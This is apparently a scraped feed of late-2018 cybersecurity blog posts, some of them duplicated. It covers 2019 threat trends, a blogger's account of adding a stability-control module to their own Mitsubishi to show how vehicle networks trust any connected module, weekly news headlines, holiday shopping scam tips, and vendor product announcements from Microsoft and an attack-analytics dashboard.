Now, while state-hacking isn’t necessarily an outright declaration of war these days, it doesn’t end there. The trickledown effect of nation-state hacking is particularly concerning, as sophisticated methods used by various governments eventually find their way into the hands of resourceful cybercriminals, typically interested in attacking businesses and individuals.

Repeat offenders

No cybersecurity hit list would be complete without the things that go bump in the night and, while all of them might not necessarily be ballooning, they’ll always be a thorn in security teams’ sides.

  • Following the 2017 Equifax breach, API security made it onto the OWASP Top 10 list and remains there for a good reason. With the expanding use of APIs and challenges in detecting attacks against them, we’ll see attackers continuing to take aim at APIs as a great target for a host of different threats; including brute force attacks, App impersonation, phishing and code injection.
  • Bad actors already understand that crypto mining is the shortest path to making a profit, and continue to hone their techniques to compromise machines in the hope of mining crypto-coins or machines that can access and control crypto-wallets.
  • Low effort, easy money, full anonymity and potentially huge damage to the victim… what’s not to like when it comes to ransomware? It’s unlikely that we’ll see these types of attacks go away anytime soon.

 

If there’s one overriding theme we’d like to carry with us into 2019 it’s the concept of general threat intelligence, the idea that it’s better to have some understanding of the dangers out there and to do something, rather than nothing at all.

 

We often talk about the difference between risk and acceptable risk or reasonable risk, and a lot of companies make the mistake of trying to boil the ocean… trying to solve every single problem they can, ultimately leaving teams feeling overwhelmed and short on budget.

 

Acceptable risk isn’t, “I lost the data because I wasn’t blocking it. I get it. And it wasn’t a huge amount of data because at least I have some controls in place to prevent somebody from taking a million records, because nobody needs to read a million records. Nobody’s going to read a million records. So, why did I let it happen in the first place?”

 

Acceptable risk is “I know it happened, I accept that it happened, but it’s a reasonable number of events, it’s a reasonable number of records, because the controls I have in place aren’t so specific, aren’t so granular that they solve the whole problem of risk, but they take me to a world of acceptable risk.”

 

It’s better to begin today, and begin at the size and relevance that you can, even if that only takes you from high to medium risk, or reasonable to acceptable risk.

The post The Year Ahead: Cybersecurity Trends To Look Out for In 2019 appeared first on Blog.

How I Hacked My Connected Vehicle, and Other Thoughts on Vehicle Cybersecurity

In the near future, self-driving vehicles will likely be the norm. Cars today are essentially just computers with wheels, and they’re becoming increasingly interconnected. This, of course, provides opportunities to make our lives easier, but it also increases the digital attack surface and potential risks if manufacturers leave proper vehicle cybersecurity measures unaddressed or incomplete.

Whether or not you’re into car hacks, I invite you to continue reading. I’ll share some insights into what we can expect for the future of connected vehicles and the security challenges this represents to customers and manufacturers — and also explain how I was able to hack my Mitsubishi.

Car Electronics 101

First, if you’re new to car electronics, it’s important to understand a few basic concepts. A few years back, before I started getting into car hacks, I remember friends saying their car computers had an issue and needed to be replaced. I used to imagine there was only one computer in a car that controlled all electronics, but I couldn’t have been more wrong.

Modern vehicles have several computers, each designed for very specific tasks, and they’re interconnected by an internal network. Modern vehicles also have sensors that measure everything from temperature to oil pressure, wheel speed, tire inflation, and more, all of which are controlled by specific modules that are, in essence, very specialized computers.

Below is a list of the most commonly found car electronics. Note that this isn’t an exhaustive list, and different car manufactures may name these systems differently:

  1. Engine control module (ECM)
  2. Transmission control unit (TCU)
  3. Body control module (BCM)
  4. Electronic brake control module (EBCM)
  5. Climate control unit
  6. Supplemental restraint system (SRS) control module

Vehicles today commonly implement what’s known as a Controller Area Network (CAN bus) so the different modules/computers inside a vehicle can share information. For example, the ECM may need to inform you about a problem with the engine by sending an error code to be displayed on the dashboard, or the EBCM may need to send a signal to the ECM to reduce engine torque if the current driving terrain is too slippery.

In fact, the internal vehicle network is constantly loaded with hundreds of messages being sent every minute from all different sensors and computers. Just like the early days of the internet, where all computers were expected to be “good,” the computers inside your car will receive and execute any instruction because it’s expected that everything they receive comes from a trusted source.

Listen to the podcast: Connected Cars, Smart Homes and IoT Security

Emerging Challenges Related to Connected Vehicles

Technologies like vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communications are on the rise, and I’m sure they’ll provide many benefits to consumers, manufactures and even public infrastructure management. In the future, it will likely be very common for vehicles to receive updates over the air (OTA) just like your smartphone does today. This may help improve existing features and performance or even add new features to your vehicle.

However, it is of the utmost importance that proper security controls are taken into consideration from the very early stages given that every new technology represents a potential new attack vector. For example, attacks that involve cloning your wireless key fob are becoming more common, and until car manufacturers addresses these security weaknesses, you may want to store your wireless key fob in a Faraday bag.

Additionally, every car manufacturer uses different codes or messages in their CAN bus — for example, an instruction taken from the CAN bus that contains “665 F0 16 00 00” may instruct the car to turn on the headlights for one manufacturer, but it may turn up the radio volume for another, or simply do nothing. This represents another challenge for security researches as these instructions are often not publicly available and must be reverse engineered. This can add a level of difficulty for someone that may want to hack your car by adding, for example, a module to control your car remotely using a cellular network, but it certainly doesn’t make the task impossible.

How I Was Able to Hack My Vehicle

To demonstrate that it is possible to add new modules/computers that a vehicle will simply trust without performing any checks, I’ll share with you the details of how I was able to add a set of new features to my own vehicle. Although the module I added is from the same manufacturer, someone with enough knowledge and time can create their own module and add it to a car.

The feature I wanted to add to my Mitsubishi car is called Active Stability and Traction Control (ASTC), which combines traction control and stability control and can also be useful for specific off-road situations. I set out to get a copy of the workshop manual for the car, which contains detailed wiring diagrams of all components. While reading through it, it became evident that the ASTC feature was controlled by the EBCM, so I knew I had two options: try to modify the firmware of my unit or get a different model of EBCM. Reverse engineering a firmware from scratch takes a lot of work and skills, so at that point, the most reasonable option was to get a different model of EBCM that already had the ASTC feature.

After reviewing the workshop manual, I found the wiring diagram, and it showed that this new EBCM also needed a steering angle sensor (SAS), an ASTC off button, a new relay called a stop lamp relay and some changes in the brakes wiring. For reference, below are the two wiring diagrams from the workshop manual that helped me understand how my car is wired (the question marks represent the wires that were missing on my car).

Diagram 1

Diagram 2

Before purchasing the required components, I wanted to make sure this would work. So, I started to review the wires directly from my car, and to my surprise, the harness for the SAS and the ASTC off button were already there. It seemed that the required components for the ASTC feature should interact with each other, so there was only one missing piece of the puzzle: Will the new components integrate with all the other control modules?

I performed some additional research and came across something car manufacturers call variant coding, which is a code that tells all control modules which features they have enabled and which are disabled. For Mitsubishi vehicles, this code is set on the BCM — they call it ETACS — so without the ability to modify the variant code, the new EBCM wouldn’t work. Fortunately, there’s a tool called ETACS decoder developed by Earl Vadim that allows you to do exactly that.

So, I purchased all the required parts, plugged them in and rewired everything according to the specifications in the workshop manual. Pictured below is the EBCM main plug on which I had to perform some rewiring.

Plug image 1

After turning the car on, as expected, a bunch of diagnostic trouble codes (DTCs) popped up since the new EBCM was expecting a variant coding with the ASTC feature enabled.

Errors image 1

What followed were several hours of trial and error, disconnecting the car battery and reconnecting it after each change on the variant coding. Finally, I found the right variant code for this specific car make, model and set of features, shown below.

Coding image 1

Most of the DTCs were gone at this point, and all that was left to do was calibrate the SAS and change a setting on the ECM to tell it that the ASTC module was available (this was done with the same ETACS decoder software).

Finally, I went out for a test drive and the ASTC feature seemed to work as expected. However, there was one missing piece: There was supposed to be a light on the dashboard that would tell me each time ASTC was engaged, but I did not see that light popping up during the test drive. The next step was to disassemble the dashboard and check what was going on. After opening it, it became evident that the LED for ASTC, as well as some resistors and transistors, were missing. Fortunately, the circuit board had the space to solder in all those components.

The Future of Vehicle Cybersecurity

The same methods I used to perform these modifications could allow a malicious hacker to embed a custom piece of hardware and control almost any feature on a vehicle, ranging from brakes and acceleration to windshield wipers and microphone. This can be as simple as putting together a Raspberry Pi, a CAN bus interface and wireless access, then plugging it into the CAN bus of a vehicle. Doing this would require physical access to the vehicle, but remember that connected vehicles are becoming more and more common these days.

To wrap up, here are some key takeaways from this project:

  1. Variant code tells the control modules of a car which features are active or inactive.
  2. There are several computers in modern vehicles, each managing very specific tasks, that are interconnected through a local network within the car.
  3. Components from different models made by a manufacturer may work if they are properly configured and wired.
  4. Car control modules trust whatever information is sent on the local network and don’t seem to perform any kind of validation of the packets or the authenticity of other control modules or devices connected to the CAN bus.
  5. Most importantly, anyone with enough knowledge and time can create modules to control your car remotely.

And remember: Any device that can wirelessly provide access to the internal CAN bus of a vehicle is a potential new attack vector, making it critical to implement proper vehicle cybersecurity measures.

Listen to the podcast: Connected Cars, Smart Homes and IoT Security

The post How I Hacked My Connected Vehicle, and Other Thoughts on Vehicle Cybersecurity appeared first on Security Intelligence.

The year ahead: More breaches, bolstered regulation and the rise of AI

This time of the year is always exciting for us, as we get to take a step back, analyze how we did throughout the year, and look ahead at what the coming year will bring. Taking full advantage of our team’s expertise in data and application security, and mining insights from our global customer base, we’ve decided to take a different approach this time around and focus on three key, and overriding trends we see … More

The post The year ahead: More breaches, bolstered regulation and the rise of AI appeared first on Help Net Security.

Digital skills are critical for tackling the rising tide of cybercrime

The rising tide of cybercrime shows no sign of slowing. Whether it’s hacking, identity fraud or malware attacks, online criminals have proven themselves to be both relentless and ruthless. Targets have included public sector institutions, charities, even the UK’s National Health Service (NHS) was not spared. In this challenging climate, it is unsurprising that police forces are facing extreme pressure to protect victims and take meaningful action against the perpetrators, who are hard to track … More

The post Digital skills are critical for tackling the rising tide of cybercrime appeared first on Help Net Security.

Equifax: A study in accountability but not authority responsibility

Like most of the security community, I have spent hours digesting the recently released U.S. House of Representatives Committee on Oversight and Government Reform report on the Equifax breach. I read the report with a mix of heartfelt empathy and fear-inducing understanding of some of the findings. I feel empathy because my role has offered me a unique view on the size and scope of the threats facing many organization; fear because some of the … More

The post Equifax: A study in accountability but not authority responsibility appeared first on Help Net Security.

Security Affairs newsletter Round 192 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

STOLEN PENCIL campaign, hackers target academic institutions.
WordPress botnet composed of +20k installs targets other sites
A new Mac malware combines a backdoor and a crypto-miner
Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS
Expert devised a new WiFi hack that works on WPA/WPA2
Hackers defaced Linux.org with DNS hijack
Google will shut down consumer version of Google+ earlier due to a bug
Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries
Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept
A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack
Cyber attack hit the Italian oil and gas services company Saipem
New threat actor SandCat exploited recently patched CVE-2018-8611 0day
Novidade, a new Exploit Kit is targeting SOHO Routers
French foreign ministry announced its Travel Alert Registry Hack
ID Numbers for 120 Million Brazilians taxpayers exposed online
Operation Sharpshooter targets critical infrastructure and global defense
A bug in Facebook Photo API exposed photos of 6.8 Million users
New Sofacy campaign aims at Government agencies across the world
WordPress version 5.0.1 addressed several vulnerabilities
Magellan RCE flaw in SQLite potentially affects billions of apps
Which are the worst passwords for 2018?

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 192 – News of the week appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 192 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

STOLEN PENCIL campaign, hackers target academic institutions.
WordPress botnet composed of +20k installs targets other sites
A new Mac malware combines a backdoor and a crypto-miner
Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS
Expert devised a new WiFi hack that works on WPA/WPA2
Hackers defaced Linux.org with DNS hijack
Google will shut down consumer version of Google+ earlier due to a bug
Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries
Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept
A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack
Cyber attack hit the Italian oil and gas services company Saipem
New threat actor SandCat exploited recently patched CVE-2018-8611 0day
Novidade, a new Exploit Kit is targeting SOHO Routers
French foreign ministry announced its Travel Alert Registry Hack
ID Numbers for 120 Million Brazilians taxpayers exposed online
Operation Sharpshooter targets critical infrastructure and global defense
A bug in Facebook Photo API exposed photos of 6.8 Million users
New Sofacy campaign aims at Government agencies across the world
WordPress version 5.0.1 addressed several vulnerabilities
Magellan RCE flaw in SQLite potentially affects billions of apps
Which are the worst passwords for 2018?

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 192 – News of the week appeared first on Security Affairs.



Security Affairs

Security Breach of Over 120 million Taxpayers in Brazil

Recently, the Tax ID, better known as Cadastro de Pessoas Fisicas (CPF ID) consisting of over 120 million taxpayers in

Security Breach of Over 120 million Taxpayers in Brazil on Latest Hacking News.

McAfee Blogs: Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.



McAfee Blogs

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Tips for avoiding Christmas scams

Christmas is supposed to be a time for joy, peace and goodwill to everyone – but criminals aren’t getting the message. In fact, one US cybersecurity firm estimates that online crime will increase by nearly 60% over the festive period.

These figures shouldn’t be a surprise. The amount of shopping we do online increases exponentially during December, particularly around Black Friday. Cyber Monday and the period between Boxing Day and New Year.

So how can you better protect yourself in the face of concerted efforts to steal your money and personal information?

Fake websites

Probably the easiest scam to spot – and avoid – is the fake website. Scammers will often set up online shops that look “real”, copying a well-known brand’s website. But if you try and buy something, you will not receive your goods, and the scammer may steal your credit card details too.

There are two quick and effective ways to identify a fake website. First, the actual address will not be quite right. Instead of amazon.com, the site address may be amazon-us.com – close, but wrong.

Second, the prices advertised are much, much lower than you can find anywhere else. Retailers can reduce prices a little, but they tend to be very similar across the market. If an offer is too good to be true, it probably is.

You can protect yourself against fake websites by checking whether they fail either of the tests above. You should also install an Internet safety toolkit like Panda Dome which includes a safe browsing feature, designed to stop you being tricked into visiting fake websites.

Phishing emails

Another form of fakery, phishing emails generally pretend to come from a well-known retailer. Some will try and convince you to click through to a standard fake website, others will trick your computer into downloading malware.

Malware presents the biggest threat to your personal security online. Hackers can use these tiny applications to scan your computer for valuable – or embarrassing – data to steal. They can monitor exactly what you type on your keyboard – including passwords and credit card numbers – over the course of days, weeks or months. Or your computer could be joined to a bot network, ready to participate in a larger fraud at some point in the future.

Because the run up to Christmas is so busy, it is easy to let your guard down. Time is short and your inbox is full, so you may not conduct the quick checks that protect you. But it is absolutely vital that you check each message for the following:

  • Sender address – any sales email coming from a “free” service like Gmail or Yahoo is likely to be fake.
  • Message attachments – legitimate sales emails never contain attachments, but fakes do.
  • Spelling and grammar – poorly worded emails are often a sign that the message may be fake, written by a foreign hacking gang.

Any message that fails these tests should be scanned using an anti-malware tool like Panda Dome – or deleted immediately.

Protect yourself now

According to the study mentioned at the star of this article, cyberattacks peak just after Christmas – so it’s not too late to protect yourself. Download a free trial of Panda Dome today and help to keep your computer safe from Christmas killjoys.

Download Free Antivirus

The post Tips for avoiding Christmas scams appeared first on Panda Security Mediacenter.

Most concerning security controls for cyberattackers? Deception and IDS

Attivo Networks surveyed more than 450 cybersecurity professionals and executives globally to gain insights into detection trends, top threat concerns, attack surface concerns, and what’s on their 2019 security wish list. Overall, the survey highlighted that the battle to keep cyber attackers from successfully compromising networks is not working. Over 50% of respondents reported that 100 days of dwell time or more was representative of their organization, while nearly half of respondents indicated that their … More

The post Most concerning security controls for cyberattackers? Deception and IDS appeared first on Help Net Security.

Most organizations suffered a business-disrupting cyber event

A study conducted by Ponemon Institute found that 60 percent of organizations globally had suffered two or more business-disrupting cyber events — defined as cyber attacks causing data breaches or significant disruption and downtime to business operations, plant and operational equipment — in the last 24 months. Further, 91 percent of respondents had suffered at least one such cyber event in the same time period. Despite this documented history of damaging attacks, the study found … More

The post Most organizations suffered a business-disrupting cyber event appeared first on Help Net Security.

Microsoft AI competition explores the next evolution of predictive technologies in security

Predictive technologies are already effective at detecting and blocking malware at first sight. A new malware prediction competition on Kaggle will challenge the data science community to push these technologies even furtherto stop malware before it is even seen.

The Microsoft-sponsored competition calls for participants to predict if a device is likely to encounter malware given the current machine state. Participants will build models using 9.4GB of anonymized data from 16.8M devices, and the resulting models will be scored by their ability to make correct predictions. Winning teams get $25,000 in total prizes.

The competition provides academics and researchers with varied backgrounds a fresh opportunity to work on a real-world problem using a fresh set of data from Microsoft. Results from the contest will help us identify opportunities to further improve Microsofts layered defenses, focusing on preventative protection. Not all machines are equally likely to get malware; competitors will help build models for identifying devices that have a higher risk of getting malware so that preemptive action can be taken.

Cybersecurity is the central challenge of our digital age. Today, Windows Defender Advanced Threat Protection (Windows Defender ATP) uses intelligent systems to protect millions of devices against cyberattacks every day. Machine learning and artificial intelligence drive cloud-delivered protections that catch and predict new and emerging threats.

We also believe in the power of working with the broader research community to stay ahead of threats. Microsofts 2015 malware classification competition on Kaggle was a huge success, with the dataset provided by Microsoft cited in more than 50 research papers in multiple languages. To this day, the 0.5TB dataset from that competition is still used for research and continues to produce value for Microsoft and the data science community. This new competition is organized by the Windows Defender ATP Research team, in cooperation with Northeastern University and Georgia Institute of Technology as academic partners, with the goal of bringing new ideas to the fight against malware attacks and breaches.

Kaggle is a platform for data scientists to create data science projects, download datasets, and participate in contests. Microsoft is happy to use the Kaggle platform to engage a rich community of amazing thinkers. We think this collaboration will result in better protection for Microsoft customers and the Internet at large. Stay tuned for the results, we cant wait to see what the data science community comes up with!

Click here to join the competition.

 

 

Chase Thomas and Robert McCann
Windows Defender Research team

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Microsoft AI competition explores the next evolution of predictive technologies in security appeared first on Microsoft Secure.

British Teenager gets 3 year sentence for DDoS and False Bomb Threats

Recently, the Luton Crown Court sentenced a British teenager for sending out false bomb threats and carrying out DDoS attacks.

British Teenager gets 3 year sentence for DDoS and False Bomb Threats on Latest Hacking News.

Microsoft urges for Legal Framework to govern Facial recognition

Microsoft has reportedly sought for a reasonable legal framework for the deployment and use of facial recognition technology. While this

Microsoft urges for Legal Framework to govern Facial recognition on Latest Hacking News.

Deception technology: Authenticity and why it matters

This article is the second in a five-part series being developed by Dr. Edward Amoroso in conjunction with the deception technology team from Attivo Networks. The article provides an overview of the central role that authenticity plays in the establishment of deception as a practical defense and cyber risk reduction measure. Requirements for authenticity in deception The over-arching goal for any cyber deception system is to create target computing and networking systems and infrastructure that … More

The post Deception technology: Authenticity and why it matters appeared first on Help Net Security.

Can advancing cybersecurity techniques keep pace with new attack vectors in 2019?

A look back through a volatile 2018 has seen the cyber security landscape move towards an even more complex picture. This has been driven by the increased volume and diversity of threats and breaches, tools and network evolution. Security professionals have faced significant challenges in attack detection and mitigation, operating to the necessary policy and legal guidelines and growing teams with suitably-skilled personnel. None of these advances show any signs of slowing in 2019. However, … More

The post Can advancing cybersecurity techniques keep pace with new attack vectors in 2019? appeared first on Help Net Security.

Leveraging AI and automation for successful DevSecOps

As engineering teams try to innovate at a faster pace, being able to maintain the quality, performance and security of the applications become much more important. Organizations have found huge success in improving their overall product quality while ensuring security controls and compliance requirements are met. AI-driven automation solutions have aided engineering teams in automating key processes and leverage predictive analytics, to identify issues before they occur and taking corrective actions, improving the overall product … More

The post Leveraging AI and automation for successful DevSecOps appeared first on Help Net Security.

Hacking democracy efforts continue with upticks in malware deployments

Comodo Cybersecurity released its Global Threat Report 2018 Q3, offering insights from Comodo Threat Research Lab experts into key cyberthreat trends and the impact of malware on elections and other geopolitical events. Hacking democracy and malware in conflict zones The Comodo Q3 report also reveals disturbing upticks in malware deployment leading up to major national elections. Comodo Cybersecurity researchers document the impact of malware on elections in Russia, Turkey, Mali, Sierra Leone, Azerbaijan and Columbia. … More

The post Hacking democracy efforts continue with upticks in malware deployments appeared first on Help Net Security.

Read: New Attack Analytics Dashboard Streamlines Security Investigations

Attack Analytics, launched this May, aimed to crush the maddening pace of alerts that security teams were receiving. For security analysts unable to triage this avalanche of alerts, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigable incidents.  Powered by artificial intelligence, Attack Analytics is able to automate what would take a team of security analysts days to investigate and to cut that investigation time down to a matter of minutes.

Building upon the success of our launch, we are now introducing the Attack Analytics Dashboard.  Aimed at SOC (Security Operations Center) analysts, managers, and WAF administrators to provide a high-level summary of the type of security attacks that are hitting their web applications; it helps to speed up security investigations and quickly zoom in on abnormal behaviors.

The WAF admin or the SOC can use the Dashboard to get a high-level summary of the security attacks that have happened over a period of time (the last 24 hours, 7 days, 30 days, 90 days or other customized time range):

  • Attack Trends: Incidents and events
  • Top Geographic Areas: Where attacks have originated
  • Top Attacked Resources
  • Breakdown of Attack Tool Types
  • Top Security Violations (Bad Bots, Illegal Resource Access, SQL injections, Cross-Site Scripting, etc.)

Events vs. incidents

Upon entering the Attack Analytics Dashboard, you can see the Incidents tab, which shows the attack trends across time, classified according to severity (critical, major and minor).  A quick scan allows you to understand if a sudden jump in incidents may deserve immediate attention.

In the Events tab, you can see the number of events vs. incidents which have occurred over a specific period of time. For example – the marked point in the graph shows that on October 4th there were 2,142 alerts that were clustered into 19 security incidents. If you want to understand what happened on this day, you can drill down and investigate these 19 incidents.

Next, you can see the Top Attack Origin countries which have attacked your websites over a specified period of time. This again could help identify any abnormal behavior from a specific country. In the snapshot below, you can see the “Distributed” incidents. This means that this customer experienced 4 distributed attacks, with no dominant country, and could imply the attacks originated from botnets spread across the world.

Top attacked resources

Top Attacked Resources provides a snapshot of your most attacked web resources by percentage of critical incidents and the total number of incidents. In this example, singular assets are examined as well as a distributed attack across the customer’s assets. In the 3rd row, you can see that the customer (in this case, our own platform) experienced 191 distributed attacks. This means that each attack targeted a few hosts under our brand name; for example, it may have been a scanning attack aimed at finding vulnerable hosts.

Attack tool types

A SOC Manager/WAF admin might also want to understand the type of attack tools that are being used.  In the example below, on the left, you see the distribution of incidents according to the tool types and on the right, you see the drill-down into the malicious tools, so you can better understand your attack landscape. Over the last 90 days, there were 2.38K incidents that used malicious tools. On the right we can see the breakdown of the different tools and the number of incidents for each one – for example, there were 279 incidents with a dominant malicious tool called LTX71.

We think you’ll quickly discover the benefits which the new Attack Analytics Dashboard provides as it helps you pinpoint abnormal behaviors and speed up your security investigations. It should also assist you in providing other stakeholders within your company a high-level look at the value of your WAF.

And right now, we have even more dashboard insight enrichments in the works, such as:

  • False Positives Suspects: Incidents our algorithms predict to be highly probable of being false positives.
  • Community Attacks (Spray and Pray Attacks): Provide a list of incidents that are targeting you as part of a larger campaign – based on information gathered from our crowdsourced customer data.

Stay tuned for more!

The post Read: New Attack Analytics Dashboard Streamlines Security Investigations appeared first on Blog.

The evolution of Microsoft Threat Protection, December update

December was another month of significant development for Microsoft Threat Protection capabilities. As a quick recap, Microsoft Threat Protection is an integrated solution securing the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. Last month, we shared updates on capabilities for securing identities, endpoints, user data, and cloud apps. This month, we provide an update for Azure Security Center which secures organizations from threats across hybrid cloud workloads. Additionally, we overview a real-world scenario showcasing Microsoft Threat Protection in action.

Enhancing your infrastructure security using Azure Security Center

Azure Security Center is a sophisticated service designed to help organizations:

  • Understand their security state across on-premises and cloud workloads.
  • Find vulnerabilities and remediate quickly.
  • Limit exposure to threats.
  • Detect and respond swiftly to attacks.

With modern organizations now adopting hybrid ecosystems, securing the infrastructure across hybrid cloud workloads becomes more critical. Azure Security Center was developed to address the complexities of the modern infrastructure by helping strengthen your security posture and protect against threats to the infrastructure. Azure Security Center can now provide better visibility over an organizations security state across virtual networks, subnets, and nodes by generating a topology map of the layout of each of these infrastructure components (Figure 1). As admins review the components of the network, Azure Security Center offers recommendations to help quickly respond to detected network issues. Additionally, Azure Security Center continuously analyzes the network security group (NSG) rules in the workload and presents a graph containing the possible reachability of every virtual machine (VM) in that workload.

Figure 1. Network topology map highlighting virtual networks, subnets, and nodes.

Another important enhancement is a new permissions model for Just in Time (JIT) VM access (Figure 2). Azure Security Center has updated its required privileges for a user to successfully request JIT access to a VM from write to read, making it easier for customers to follow the least privilegedRole-Based Access Control (RBAC) model. JIT VM access is used to reduce impact from brute force attacks targeting management ports to gain access to a VM. If successful, an attacker can take control over the VM and establish a foothold into your environment. When JIT access is enabled, Azure Security Center locks down inbound traffic to Azure VMs by creating an NSG rule. Admins select the ports on the VM to which inbound traffic will be locked down. These ports are controlled by the JIT solution. Before, when a user requested access to a VM, Azure Security Center checked a users RBAC permissions for write access for the VM, and now the user must only have read access.

Figure 2. The Azure Security Center highlighting the JIT VM access feature.

Microsoft Threat Protection stops threats as envisioned

Security solutions always sound effective in theory, but in practice, often the capabilities do not match the vision. Microsoft Threat Protection was recently put to the test against a real-world threat known as Tropic Trooper (Figure 3), which has been targeting Asian enterprises in the energy and food and beverage industries since 2012.

